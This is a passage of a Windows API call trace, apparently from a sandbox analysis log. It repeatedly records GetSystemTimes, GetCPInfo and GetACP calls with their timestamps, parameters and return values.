lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.647] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.647] GetACP () returned 0x4e4 [0044.647] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.648] GetACP () returned 0x4e4 [0044.648] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.648] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.649] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.649] GetACP () returned 0x4e4 [0044.649] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.650] GetACP () returned 0x4e4 [0044.650] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.650] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.651] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.651] GetACP () returned 0x4e4 [0044.651] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.652] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.652] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.652] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.653] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.653] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.653] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.654] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.654] GetACP () returned 0x4e4 [0044.654] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0044.655] GetACP () returned 0x4e4 [0044.655] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0044.655] 